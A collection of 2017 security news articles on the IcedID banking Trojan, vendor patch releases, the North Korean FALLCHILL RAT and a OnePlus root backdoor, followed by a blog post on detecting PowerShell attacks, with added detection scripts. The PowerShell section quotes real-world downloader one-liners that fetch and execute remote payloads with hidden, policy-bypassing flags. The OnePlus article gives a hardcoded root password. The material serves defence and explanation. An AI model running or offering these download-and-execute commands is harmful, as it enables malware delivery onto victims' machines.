The new threat was first observed in September 2017 as part of test campaigns, and is now actively targeting banks, payment card providers, mobile services providers, payroll accounts, webmail accounts and e-commerce sites in the United States, along with two major banks in the United Kingdom.

Although it does include features comparable with those of other banking Trojans out there and can perform advanced browser manipulation tactics, IcedID does not seem to borrow code from other Trojans, IBM says. However, because the threat includes capabilities already on par with those of Trojans such as Zeus, Gozi and Dridex, the researchers believe IcedID will receive further updates soon.

As part of the initial infection campaigns, the new banking Trojan has been dropped through the Emotet Trojan, which led X-Force research to believe that its operators aren’t new to the threat arena.

Emotet has been the distribution vehicle for many malware families this year, mainly focused on the U.S., but also targeting the U.K. and other parts of the world. In 2017, Emotet has been serving “elite cybercrime groups from Eastern Europe, such as those operating QakBot and Dridex,” and has now added IcedID to its payload list, IBM says.

First spotted in 2014 as a banking Trojan, Emotet is distributed via malicious spam emails, usually inside documents that feature malicious macros. Once on a machine, Emotet achieves persistence and ensnares the system into a botnet. It also fetches a spamming module, a network worm module, and password and data stealers.

IcedID itself includes network propagation capabilities, which suggests its authors might be targeting businesses with the new threat. IBM observed the malware infecting terminal servers, which usually provide endpoints, printers, and shared network devices with a common connection point to a local area network (LAN) or a wide area network (WAN).

The Trojan queries the lightweight directory access protocol (LDAP) to discover other users to infect, the researchers say. They also note that, on the compromised systems, the malware sets up a local proxy for traffic tunneling to monitor the victim’s online activity and leverages both web injections and redirections to perform its nefarious operations.

IcedID downloads the configuration file (containing a list of targets) from its command and control (C&C) server when the user opens a web browser. It was also observed using secure sockets layer (SSL) for communication with the server.

The malware doesn’t appear to feature advanced anti-virtual machine (VM) or anti-research techniques, although it does require a reboot to complete the deployment, most likely to evade sandboxes that do not emulate rebooting.

For persistence, the malware creates a Run key in the registry, after which it writes an RSA crypto key to the system's AppData folder. The researchers have yet to determine the exact purpose of this key.

The redirection technique employed by IcedID is designed to appear as seamless as possible to the victim. Thus, the legitimate bank’s URL is displayed in the address bar, along with the bank’s correct SSL certificate, which means that the connection with the actual bank’s site is kept alive. The victim, however, is tricked into revealing their credentials on a fake web page. Through social engineering, the victim is also fooled into revealing transaction authorization elements.

During a single campaign in late October, the Trojan was observed communicating with four different C&C servers.

The malware’s operators also use a dedicated, web-based remote panel to orchestrate webinjection attacks for the targeted bank sites. The panel is accessible with a username and password combination. The server the panel communicates with is based on the OpenResty web platform.

“Webinjection panels are typically commercial offerings criminals buy in underground markets. It is possible that IcedID uses a commercial panel or that IcedID itself is commercial malware. However, at this time there is no indication that IcedID is being sold in the underground or Dark Web marketplaces,” IBM notes.
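The report describes two host-side behaviours that are cheap to correlate in endpoint telemetry: the Run key written for persistence and the key file dropped under AppData afterwards. The PowerShell function below is an added example, not code from IBM X-Force or the article; it correlates those two behaviours per process over a constructed set of Sysmon-style records (field names follow Sysmon's RegistryEvent ID 13 and FileCreate ID 11; the events, GUIDs and paths are invented for the demo) and flags a process that does both within a short window, while a benign installer that writes a Run key but drops nothing under AppData is left alone.

```powershell
# Added example (not from the article or IBM's report): flag a process that
# writes a Run/RunOnce key and then creates a file under AppData within
# $WindowSeconds. Events are Sysmon-style objects; the sample set below is
# constructed for the demo.
function Find-RunKeyThenAppDataDrop {
    param(
        [Parameter(Mandatory)] [object[]] $Events,
        [int] $WindowSeconds = 120
    )
    $runKeyPattern = '\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?\\'
    $runWrites = $Events | Where-Object {
        $_.EventId -eq 13 -and $_.TargetObject -match $runKeyPattern
    }
    foreach ($rw in $runWrites) {
        # Same process (ProcessGuid), file created under AppData, after the key write.
        $drops = $Events | Where-Object {
            $_.EventId -eq 11 -and
            $_.ProcessGuid -eq $rw.ProcessGuid -and
            $_.TargetFilename -match '\\AppData\\' -and
            $_.UtcTime -ge $rw.UtcTime -and
            ($_.UtcTime - $rw.UtcTime).TotalSeconds -le $WindowSeconds
        }
        foreach ($d in $drops) {
            [pscustomobject]@{
                ProcessGuid = $rw.ProcessGuid
                Image       = $rw.Image
                RunKey      = $rw.TargetObject
                Dropped     = $d.TargetFilename
                DelaySec    = [int]($d.UtcTime - $rw.UtcTime).TotalSeconds
            }
        }
    }
}

# Constructed sample telemetry (not real events).
$t0 = Get-Date '2017-11-15T10:00:00Z'
$sample = @(
    [pscustomobject]@{ EventId = 13; UtcTime = $t0; ProcessGuid = '{A}'
                       Image = 'C:\Users\u\AppData\Local\Temp\x.exe'
                       TargetObject = 'HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\x' },
    [pscustomobject]@{ EventId = 11; UtcTime = $t0.AddSeconds(5); ProcessGuid = '{A}'
                       Image = 'C:\Users\u\AppData\Local\Temp\x.exe'
                       TargetFilename = 'C:\Users\u\AppData\Roaming\x\key.dat' },
    # Benign installer: Run key, but the file lands under Program Files, so no hit.
    [pscustomobject]@{ EventId = 13; UtcTime = $t0.AddSeconds(30); ProcessGuid = '{B}'
                       Image = 'C:\Program Files\Vendor\setup.exe'
                       TargetObject = 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Vendor' },
    [pscustomobject]@{ EventId = 11; UtcTime = $t0.AddSeconds(31); ProcessGuid = '{B}'
                       Image = 'C:\Program Files\Vendor\setup.exe'
                       TargetFilename = 'C:\Program Files\Vendor\app.exe' }
)

# Expected: one row, for process {A}.
Find-RunKeyThenAppDataDrop -Events $sample | Format-Table -AutoSize
```

This is a hunting heuristic rather than a signature: legitimate updaters occasionally match it, so the output is a triage list, and the Image column is what to pivot on first (an executable running from a Temp folder, as in the sample, is the more suspicious case).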

Adobe Patches 80 Flaws Across Nine Products
15.11.2017 securityweek 
Adobe on Tuesday announced the availability of patches for a total of 80 vulnerabilities across the company’s Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

The highest number of vulnerabilities, 56, has been addressed in Acrobat and Reader for Windows and Mac. The list includes many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

A total of 16 companies and individuals have been credited for reporting the Acrobat and Reader security holes. Well over half of the flaws were discovered by employees of China-based Tencent.

Updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player patch five critical out-of-bounds read and use-after-free vulnerabilities that can be exploited for remote code execution.

Critical code execution weaknesses have also been resolved in the Windows and Mac versions of Photoshop CC, and Shockwave Player for Windows.

In Adobe Connect, the company fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) issues, and added a feature designed to help administrators protect users against clickjacking attacks.

In Digital Editions for Windows, Mac, iOS, and Android, Adobe addressed six bugs that can lead to disclosure of memory addresses and other information.

Adobe also advised users to update Experience Manager in order to address moderate and important severity XSS and information disclosure vulnerabilities. One critical memory corruption flaw was patched in DNG Converter for Windows, and one similar issue was resolved in InDesign for Windows and Mac.

Adobe says there is no evidence that any of these flaws have been exploited in the wild. On last month’s Patch Tuesday, Adobe announced that there had not been any security updates. However, the company was forced to release an out-of-band update just a few days later after learning of a Flash Player zero-day that had been exploited by a Middle Eastern threat actor to deliver spyware.

Microsoft has also released its Patch Tuesday updates. The company addressed more than 50 vulnerabilities, including 20 critical browser flaws.

Microsoft Patches 20 Critical Browser Vulnerabilities
15.11.2017 securityweek 
Microsoft’s Patch Tuesday updates for November address more than 50 vulnerabilities, including 20 critical flaws affecting the company’s web browsers.

A total of 53 CVE identifiers have been assigned to the security bugs addressed by Microsoft this month. None of them appear to have been exploited in attacks before the company released the patches.

Three of the flaws have already been publicly disclosed. These are a browser memory corruption that can lead to code execution (CVE-2017-11827), an information disclosure issue in ASP.NET (CVE-2017-8700), and an information disclosure bug in Internet Explorer (CVE-2017-11848).

A total of 20 critical vulnerabilities have been addressed this month and they all affect Internet Explorer and/or Edge. The security holes exist due to the way the browsers, particularly the scripting engines they use, handle objects in memory.

The vulnerabilities can be exploited for arbitrary code execution by getting the targeted user to access a specially crafted website via the vulnerable web browser.

These critical flaws were reported to Microsoft by independent researchers and employees of Palo Alto Networks, Qihoo 360, Google, and the UK’s National Cyber Security Centre (NCSC). Many of the security holes were found by the Google Project Zero researcher known as Lokihardt and their details will likely be made public by Google in the upcoming period.

Other vulnerabilities patched this month by Microsoft include important severity denial-of-service (DoS) and privilege escalation bugs in ASP.NET, a Device Guard security feature bypass, information disclosure and security feature bypass issues in Edge, Office memory corruptions, and information disclosure, privilege escalation and DoS flaws in Windows.

Microsoft has also updated Adobe Flash Player components. Adobe has addressed a total of 80 vulnerabilities across nine products, including five critical out-of-bounds read and use-after-free vulnerabilities in Flash Player that can be exploited for remote code execution.

Last month, both Microsoft and Adobe patched zero-day vulnerabilities exploited by threat actors to deliver malware.

SAP Patches Critical Issues With November 2017 Security Updates
15.11.2017 securityweek 
SAP today released its November 2017 set of patches to address 22 vulnerabilities across its product portfolio, including three issues rated Very High priority (Hot News).

The enterprise software maker included 13 patches in this month’s SAP Security Patch Day, to which 9 patches that are updates to previously released security notes are added.

Three of the security notes address vulnerabilities considered Hot News, one patches a High severity issue, while the remaining 18 security notes address Moderate risk bugs. The highest CVSS score of the patches is 9.1.

This is the first SAP Security Patch Day to include Hot News security notes after one of the April 2017 security patches addressed a Very High priority vulnerability in TREX / BWA that could allow an attacker to execute commands on the affected system.

All three Hot News security notes were updates to previously released notes. One of them was patched in September 2016 and is a code injection vulnerability in Text Conversion. Onapsis, a company that specializes in securing SAP and Oracle applications and which reported the vulnerability, explains that SAP updated the security note with some additional correction instructions.

The other two flaws were both resolved in September 2017 and represent an information disclosure in SAP Landscape Management (LaMa) 3.0 and an information disclosure in LVM 2.1 and LaMa 3.0. Both bugs result in an attacker being able to access relevant data under certain conditions, Onapsis says.

According to ERPScan, another company that specializes in the security of SAP and Oracle software, 10 Support Package Notes should be added to the aforementioned 22 security notes, for a total of 32 patches (3 Hot News, 2 High, 26 Medium, and 1 Low).

13 of all the patches are updates to previously released notes and 15 of the notes were released after last month’s Security Patch Day but before today, ERPScan says.

SAP resolved 6 implementation flaws this month, 5 XSS bugs, 5 information disclosure issues, 5 missing authorization checks, 3 XML external entity flaws, 2 directory traversal bugs, a local command execution, an OS command execution, an XSRF, a clickjacking bug, a privilege escalation flaw, and a log injection issue.

Some of the most dangerous vulnerabilities addressed this month include an implementation flaw (CVSS Base Score: 8) in SAP Management Console, a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP SAPUI5, and a Cross-Site Scripting (XSS) vulnerability (CVSS Base Score: 6.1) in SAP BusinessObjects Analysis Edition for OLAP.

SAP also resolved a couple of issues impacting SAP Hana, namely an information disclosure vulnerability in SAP HANA Extended Application Services (XS Advanced) and an information disclosure in SAP NetWeaver Instance Agent Service.

U.S. Government Shares Details of FALLCHILL Malware Used by North Korea
15.11.2017 securityweek  BigBrothers
FALLCHILL Malware Used by North Korean Government Hackers is a Fully Functional RAT, DHS Says

The United States Department of Homeland Security (DHS) shared details of a hacking tool they say is being used by a threat group linked to the North Korean government known as “Hidden Cobra.”

The threat actor dubbed by the U.S. government “Hidden Cobra” is better known in the cybersecurity community as Lazarus Group, which is believed to be behind several high-profile attacks, including the ones targeting Sony Pictures, Bangladesh’s central bank, and financial organizations in Poland. Links have also been found between the threat actor and the recent WannaCry ransomware attacks, but some experts are skeptical.


A joint alert issued by the DHS and FBI said a remote administration tool (RAT) known as FALLCHILL was used by the North Korean government to hack into companies in the aerospace, telecommunications, and finance sectors. The alert describes FALLCHILL as a “fully functional RAT with multiple commands that the actors can issue from a command and control (C2) server to a victim’s system via dual proxies.”

The U.S. Government has been able to identify 83 network nodes in the infrastructure used by the FALLCHILL malware. The alert says that, according to a trusted third party, FALLCHILL uses fake SSL headers for communications. "After collecting basic system information, the backdoor will begin communication with the C&C server using a custom encrypted protocol with the header that resembles TLS/SSL packets," it reads.

In a separate alert issued Tuesday, the DHS and FBI shared a list of Internet Protocol (IP) addresses and other indicators of compromise (IOCs) associated with a variant of the Volgmer Trojan used by the North Korean government. The alert describes Volgmer as a backdoor Trojan “designed to provide covert access to a compromised system.” The DHS says at least 94 static IP addresses were identified as connected to Volgmer's infrastructure, along with dynamic IP addresses registered across various countries.

According to DHS, the North Korea-linked hackers have been using Volgmer malware in attacks against the government, financial, automotive, and media industries since at least 2013.

“DHS and FBI are distributing these IP addresses to enable network defense and reduce exposure to North Korean government malicious cyber activity,” the alert states.

The DHS warned that spear phishing appears to be the primary delivery mechanism for Volgmer infections; but added that the Hidden Cobra threat actors also use a suite of custom tools, some of which could also be used to initially compromise a system.

The alert with technical details and IOCs on FALLCHILL is available here. The alert and technical details for the Volgmer Trojan are available here.

In June, US-CERT released a technical alert to warn organizations of distributed denial-of-service (DDoS) attacks conducted by Hidden Cobra.

A Backdoor in OnePlus devices allows root access without unlocking bootloader
15.11.2017 securityaffairs Mobil

An expert discovered a backdoor in OnePlus devices that allows root access without unlocking the bootloader.
More problems for owners of OnePlus smartphones: this time experts discovered a backdoor that allows root access without unlocking the bootloader.

Just over a month after OnePlus was caught collecting personally identifiable information on its users, the Chinese smartphone company has been found leaving a backdoor on almost all OnePlus handsets.

The Twitter user who goes by the handle “Elliot Alderson @fs0c131y” (the name of Mr. Robot’s main character) discovered a backdoor in OnePlus devices running OxygenOS that could allow anyone to obtain root access to the handsets.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
In the onCreate method if the intent is not null the escalatedUp method is called with the parameter enable=true and password=getIntent().getStringExtra("code"). Do you see where I'm going? pic.twitter.com/oa1i1NdlpU

Elliot Alderson @fs0c131y
The escalatedUp method is calling Privilege.escalate(password) and if the result is true, it set the system property persist.sys.adbroot and oem.selinux.reload_policy to 1 pic.twitter.com/92LeBfDPAv

6:39 PM - Nov 13, 2017
Most OnePlus devices, including the OnePlus 2, 3, 3T and the brand-new OnePlus 5, come with a pre-installed diagnostic testing application dubbed EngineerMode.


The app was developed by Qualcomm to help device manufacturers to easily test all hardware components of the devices.

The app is visible in the list of applications installed on the OnePlus devices.

The pre-installed app is exploitable by attackers with physical access to the device and allows them to gain root access on the smartphone.

The @fs0c131y user decompiled the EngineerMode APK and shared it on GitHub; he discovered the ‘DiagEnabled’ activity, which could be opened with the hardcoded password “Angela” to gain full root access on the smartphone, without even unlocking the bootloader.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 8 others
I will find time to make a POC.
But it's not the biggest issue with this app.

Elliot Alderson @fs0c131y
The DiagEnabled, which is a @Qualcomm made activity, is the best class in this EngineerMode APK. Check the methods in this activity: escalatedUp(boolean, string) sounds like a cool thing no 😀? pic.twitter.com/iQFfam6eg6

6:34 PM - Nov 13, 2017

The problem is severe, and OnePlus users must be informed that it is possible to gain root access to the device using a simple command.


The flaw could be exploited by an attacker to perform several malicious activities, including the installation of spyware or a bootkit.

The workaround to protect vulnerable OnePlus smartphones consists of disabling root on the phone using the following commands in an ADB shell:

"setprop persist.sys.adb.engineermode 0" and "setprop persist.sys.adbroot 0" or call code *#8011#
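The two setprop commands above are a fix, not a check. The PowerShell script below, added here as an example and not part of the article or any OnePlus tooling, reads the two properties named in the workaround from a USB-connected device through adb and, with -Disable, applies the article's setprop commands to any that are not 0. It assumes adb is on PATH, USB debugging is enabled and the device is authorized; treating an empty (unset) value as the expected state is our assumption, not something the article states.

```powershell
# Added example (not from the article): audit the two properties the
# workaround refers to over adb, and optionally clear them. Property names
# come from the article; the script and its "empty means unset" reading of
# the result are ours.
param([switch]$Disable)

$Props = 'persist.sys.adb.engineermode', 'persist.sys.adbroot'

function Get-DeviceProp([string]$Name) {
    # getprop prints an empty line for an unset property.
    $value = (& adb shell getprop $Name | Out-String).Trim()
    if ($LASTEXITCODE -ne 0) {
        throw "adb failed for $Name (is the device connected and authorized?)"
    }
    return $value
}

foreach ($p in $Props) {
    $v = Get-DeviceProp $p
    if ($v -eq '' -or $v -eq '0') {
        Write-Output "[OK]   $p = '$v'"
    } else {
        Write-Output "[WARN] $p = '$v' (root over ADB may be enabled)"
        if ($Disable) {
            & adb shell setprop $p 0 | Out-Null
            Write-Output "[SET]  $p -> 0 (now '$(Get-DeviceProp $p)')"
        }
    }
}
```

Run it once without -Disable to see the current state, and once more after the fix to confirm both properties read 0; the second read after setprop inside the script is the same check done inline.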
Elliot Alderson plans to release an application to root the OnePlus devices.

13 Nov
Elliot Alderson @fs0c131y
Replying to @fs0c131y and 18 others
Awesome! Thanks to @insitusec and the @NowSecureMobile team, we have the password! It's now possible to root an @Oneplus device with a simple intent pic.twitter.com/gN0awYijBv

Elliot Alderson @fs0c131y
I will publish an application on the PlayStore to root your @OnePlus device in the next hours

10:57 PM - Nov 13, 2017
OnePlus is currently analyzing the issue.

Stay tuned!

Adobe Patch Tuesday addresses 80 flaws, 56 bugs in Reader and Acrobat
15.11.2017 securityaffairs

Adobe's Patch Tuesday release fixes a total of 80 vulnerabilities across 9 products, most of them in Acrobat and Reader, including dozens of RCE issues.
Adobe released patches for a total of 80 vulnerabilities across its products, including Flash Player, Photoshop, Connect, Acrobat and Reader, DNG Converter, InDesign, Digital Editions, Shockwave Player, and Experience Manager products.

Half of the vulnerabilities addressed with the last Adobe Patch Tuesday were discovered by experts of the Chinese firm Tencent.

The highest number of flaws (56) was fixed in Acrobat and Reader for Windows and Mac. The patches address many critical uninitialized pointer access, use-after-free, buffer access, buffer over-read, buffer overflow, out-of-bounds read/write, improper array index validation, security bypass, type confusion, and untrusted pointer dereference issues that can be exploited for remote code execution.

Adobe Patch Tuesday

Adobe fixed five remote code execution flaws by releasing updates for the Windows, Mac, Linux and Chrome OS versions of Flash Player.

The company also fixed four server-side request forgery (SSRF) and cross-site scripting (XSS) vulnerabilities in Adobe Connect, and implemented a feature to mitigate clickjacking attacks.

Adobe fixed critical code execution issues affecting the Windows and Mac versions of Photoshop CC and Shockwave Player for Windows, and solved a critical memory corruption vulnerability in DNG Converter for Windows.

Adobe addressed six flaws in Digital Editions for Windows, Mac, iOS, and Android that can lead to the disclosure of memory addresses and other sensitive data.

Adobe fixed three vulnerabilities in Experience Manager, including one information disclosure bug rated moderate severity, and addressed a critical remote code execution bug in Adobe InDesign.

According to Adobe, none of the patched vulnerabilities is under active attack.

Go to HELL, PowersHELL : Powerdown the PowerShell Attacks
15.11.2017 securityaffairs

Powerdown the PowerShell Attacks: Harnessing the power of logs to monitor PowerShell activity
Lately, I have been working on analyzing PowerShell attacks in my clients' environments. Based on that analysis and research, I have come up with a few indicators that help detect potential PowerShell attacks in your environment using Windows event logs. First, we will look at how PowerShell is weaponized in the attacks observed in the wild, and then at the detection mechanism.

How PowerShell is used in the attacks
PowerShell is extremely powerful, and attackers have increasingly been using it in their attack chains. PowerShell ships with Microsoft Windows by default, so it is readily available on victim machines for the attacker to abuse.

“PowerShell is predominantly used as a downloader”

The most prominent use of PowerShell observed in attacks in the wild is to download a malicious file from a remote location to the victim machine and execute it with commands like Start-Process, Invoke-Item or Invoke-Expression (IEX), or to download the content of the remote file directly into the memory of the victim machine and execute it from there.

Two methods of System.Net.WebClient are prevalent in live attacks:

- (New-Object System.Net.WebClient).DownloadFile()
- (New-Object System.Net.WebClient).DownloadString()

(New-Object System.Net.WebClient).DownloadFile()

The simplest example of this method, showing how it works, is the snapshot below (an experiment anyone can perform by setting up an HTTP/HTTPS server with a program like XAMPP).

In the example shown above, the file is downloaded to disk as evilfile.txt under C:\Users\kirtar_oza\AppData\Roaming, the path obtained from the $env:APPDATA environment variable, and is then executed with the Invoke-Item command.

Following is an example from one of the attacks in the wild

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://**********.com/***/**.dat', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe
In the above example, the remote file is downloaded with the DownloadFile() method and dropped under the user's AppData directory (located via the environment variable), and Start-Process is used to execute the dropped binary.

The following are some more examples of PowerShell downloads and invocations seen in the wild (the first two execute a script that was stashed in an environment variable with Invoke-Expression):

C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" iex $env:vlbjkf
C:\WINDOWS\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" Invoke-Expression $env:imumnj
C:\Windows\System32\cmd.exe" /c PowerShell "'PowerShell ""function Bdabgf([String] $hcre){(New-Object System.Net.WebClient).DownloadFile($hcre,''C:\Users\***\AppData\Local\Temp\****.exe'');Start-Process ''C:\Users\****\AppData\Local\Temp\****.exe'';}try{Bdabgf(''http://*****.com/****.png'')}catch{Bdabgf(''http://*****.de/***.png'')}'"" | Out-File -encoding ASCII -FilePath C:\Users\****\AppData\Local\Temp\*****.bat;Start-Process 'C:\Users\*****\AppData\Local\Temp\******.bat' -WindowStyle Hidden"
(New-object System.net.Webclient).DownloadString()

DownloadString() does not write any file to disk; it copies the content of the remote file directly into the memory of the victim machine. These files are typically malicious scripts that are executed directly from memory via the PowerShell -Command argument. This technique is widely used to create so-called fileless malware, where the evil script runs directly in the memory of the victim machine without dropping any file on the hard disk, and it is used to bypass signature-based detection.

The simplest example of this method is shown in the snapshot below.

Here cmd.js is a remote script that starts the calc.exe process on the victim machine without any file on disk; it runs from memory. (Note: to reproduce this, just write calc.exe in a Notepad file and save it with a .js extension.)

The following snippet is from one of the attacks in the wild

powershell -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('hxxp://******** [.]com/***/**.mdf', $env:APPDATA + '\***.exe'); Start-Process $env:APPDATA'\***.exe';(New-Object System.Net.WebClient).DownloadString('hxxp://nv******[.]com/s.php?id=po**')
In the above example, both methods are used together: DownloadString() fetches the output of a PHP script from the remote host.

PowerShell “flags” used to make operations stealthy
Attackers use a variety of options available in PowerShell to keep their operation as stealthy as possible. The following flags are widely used in attacks and can be used to build our list of indicators of compromise (IOCs). PowerShell accepts any unambiguous prefix of a parameter name, which is why the same flag shows up in several spellings.

-WindowStyle Hidden / -w hidden: hides the program window from the user, making the PowerShell operation stealthier

-ExecutionPolicy Bypass / -Exec Bypass: bypasses the execution policy (e.g. Restricted), which would otherwise prevent PowerShell scripts from running

-Command / -c: executes the given commands, as if typed at the PowerShell prompt

-EncodedCommand / -e / -Enc: passes the command as a Base64-encoded (UTF-16LE) string instead of plain text

-NoProfile / -nop: skips the commands in the user's profile script

Examples of the various flags

You can refer to the example in the previous section to see the flags -nop -Exec Bypass -Command in use.

The following are the examples of various flags used by the attackers in the wild

C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://****.com/Updates')
powershell -e <encoded input>
powershell -Enc <encoded input>
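As an added example (not part of the original post), here is a small parser that resolves the abbreviated switches the way powershell.exe does, decodes an -EncodedCommand payload and reports the downloader hints found in the resulting command. The switch table, the hidden-window value mapping and the sample command lines (modelled on the masked in-the-wild examples above, with example.invalid URLs) are assumptions of this example; powershell.exe itself accepts any unambiguous prefix of a parameter name, so a lookup that only knows -EncodedCommand misses -e and -Enc.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of a parameter name, case-insensitively,
# introduced by "-" or "/". Each entry is (canonical name, shortest accepted prefix).
# Assumption: this table covers only the switches that matter for detection; it is a
# simplified model of the host's parser, not a complete list of its parameters.
SWITCHES = [
    ("NoProfile", "nop"),
    ("NonInteractive", "noni"),
    ("NoLogo", "nol"),
    ("NoExit", "noe"),
    ("WindowStyle", "w"),
    ("ExecutionPolicy", "ex"),
    ("EncodedCommand", "e"),
    ("Command", "c"),
    ("File", "f"),
]
VALUE_SWITCHES = {"WindowStyle", "ExecutionPolicy", "EncodedCommand", "File"}
# -WindowStyle also accepts the numeric value of the ProcessWindowStyle enum (1 = Hidden).
WINDOW_STYLES = {"0": "normal", "1": "hidden", "2": "minimized", "3": "maximized"}

POWERSHELL_RE = re.compile(r'powershell(\.exe)?"?$', re.I)
WEBCLIENT_RE = re.compile(r"download(?:file|string|data)", re.I)
INVOKE_RE = re.compile(r"\biex\b|invoke-expression", re.I)


def canonical_switch(token):
    """Map a token such as -nop, /W or -Exec to its canonical parameter name, else None."""
    if len(token) < 2 or token[0] not in "-/":
        return None
    key = token[1:].lower().rstrip(":")
    if not key.isalpha():
        return None
    for name, shortest in SWITCHES:
        if name.lower().startswith(key) and key.startswith(shortest):
            return name
    return None


def encode_command(script):
    """Produce the Base64 (UTF-16LE) form that -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(payload):
    """Decode an -EncodedCommand payload; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(payload, validate=True).decode("utf-16-le")
    except ValueError:  # binascii.Error and UnicodeDecodeError both derive from ValueError
        return None


def analyse_powershell_cmdline(cmdline):
    """Return the stealth flags, decoded payload and downloader hints of one command line."""
    tokens = re.findall(r'"[^"]*"|\S+', cmdline)
    result = {"flags": {}, "decoded": None, "webclient": [], "invoke_expression": False}
    # Only parse switches after the powershell executable, so cmd.exe's own /c is ignored.
    start = next((i for i, t in enumerate(tokens) if POWERSHELL_RE.search(t)), None)
    if start is None:
        return result
    i = start + 1
    while i < len(tokens):
        name = canonical_switch(tokens[i])
        if name is None:
            i += 1
            continue
        if name in VALUE_SWITCHES and i + 1 < len(tokens):
            raw = tokens[i + 1].strip("\"'")
            if name == "EncodedCommand":
                result["decoded"] = decode_encoded_command(raw)
                result["flags"][name] = raw
            elif name == "WindowStyle":
                result["flags"][name] = WINDOW_STYLES.get(raw.lower(), raw.lower())
            else:
                result["flags"][name] = raw.lower()
            i += 2
        else:
            result["flags"][name] = True
            i += 1
    body = result["decoded"] or cmdline  # search the decoded script when there is one
    result["webclient"] = sorted({m.group(0).lower() for m in WEBCLIENT_RE.finditer(body)})
    result["invoke_expression"] = bool(INVOKE_RE.search(body))
    return result


# Constructed sample command lines, modelled on the masked in-the-wild examples in the post.
ENCODED_PAYLOAD = encode_command(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')")
SAMPLE_CMDLINES = [
    r"C:\WINDOWS\system32\cmd.exe /c powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://example.invalid/Updates')",
    r"""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -Exec Bypass -Command (New-Object System.Net.WebClient).DownloadFile('http://example.invalid/a.dat', $env:APPDATA + '\a.exe'); Start-Process $env:APPDATA'\a.exe'""",
    "powershell -NoP -NonI -W 1 -Enc " + ENCODED_PAYLOAD,
]

if __name__ == "__main__":
    for line in SAMPLE_CMDLINES:
        print(analyse_powershell_cmdline(line))
```

Feeding Process_Command_Line values through analyse_powershell_cmdline before the lookup comparison lets the alert key on canonical flag names rather than on the many spellings an attacker can choose, and the decoded payload is the text you actually want to search for DownloadString() and friends.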
Indicators of compromise
Now I will talk about the indicators of compromise that help detect suspicious PowerShell activity in the environment.

Observe the parent-child relationship of the PowerShell process
Typically, when we run PowerShell from the Windows Start menu or from its location on disk, it starts under explorer.exe; you can see the parent-child process tree with Process Explorer or Process Hacker on your system.

As shown in the screenshot, explorer.ex e is the parent process of powershell.exe.

Most of the time in PowerShell attacks, the PowerShell script or commands are launched through a command-line process; therefore, in the attacks observed in the wild, the parent of the PowerShell process is usually cmd.exe.

There are also legitimate cases where cmd.exe is the parent process of PowerShell, for example an administrator who wants to run a PowerShell script and launches PowerShell from the command prompt (cmd.exe).

“Therefore, it is important to look at the grandparent process as well, i.e. who spawned cmd.exe; that will give you an indication of whether this could be part of an attack.”

So, if the grandparent process is winword.exe, mshta.exe, wscript.exe or wuapp.exe, it is a fair indication that cmd.exe was spawned by a script, and that script is worth looking at.

“There are cases where we have observed the PowerShell process being spawned directly by winword.exe; that is a clear indication of suspicious activity that we need to log and investigate.”

This kind of behavior is typically seen in phishing cases where the user opened a Word document with an embedded macro (VBA) that spawns the PowerShell process to download the malicious content from the web.

Therefore, log and pay attention to the PowerShell process if:

- it is spawned by winword.exe (its parent process is winword.exe)
- it is spawned by cmd.exe (its parent process is cmd.exe) and cmd.exe was spawned by winword.exe (the grandparent of PowerShell is winword.exe)
- it is spawned by any of the processes above (its parent is mshta, wscript, cscript, wuapp, tasking, etc.)

Have a look at the following snippet from Process Monitor, which shows the process creation order after the sample script is executed: PowerShell is executed by wscript.exe, which means wscript.exe is the parent process of PowerShell, and PowerShell is in turn the parent process of conhost.exe, which spawns calc.exe.


The sample script is as below; copy the code into Notepad, save the file with a .js extension and run it:

// Launch powershell.exe through the Windows Script Host shell object.
var shell = new ActiveXObject('WScript.Shell');
// Invoke-Item opens calc.exe, so calc.exe ends up as a descendant of wscript.exe.
shell.Run("powershell.exe Invoke-Item c:\\windows\\system32\\calc.exe");
The indicators discussed above are indicative and by no means a comprehensive set of relationships, but they are a good starting point from which to begin logging PowerShell execution in the environment and then focus on the IOCs above to investigate further for suspicious activity.

Command lines are king
Many PowerShell attacks can be detected just by monitoring the command-line parameters passed to the PowerShell process. Moreover, they help us investigate the incident further by providing cues on where to look next for evidence. For example, if the DownloadFile() method is used, we learn the location on the hard disk where the malicious file may have been dropped and the malicious site it was downloaded from. We can take these clues and investigate further to assess the impact and behavior of the attack.

How can Windows security event logs help us detect PowerShell attacks?
There are multiple ways to enable logging for PowerShell, depending on the version of PowerShell and the operating system in use.

Today I am going to talk about the Windows event ID that helps us identify the IOCs described above. By just enabling and logging this event ID, it is possible to detect PowerShell attacks effectively.

I am talking about Windows security event ID 4688, Process Creation. Yes, it generates a hell of a lot of events, but by applying basic filtering we can log and monitor only the events of interest. By default, Process Creation auditing is disabled, so first and foremost we need to enable it via GPO (the Audit Process Creation subcategory under Detailed Tracking in the advanced audit policy). You can read more on this here.

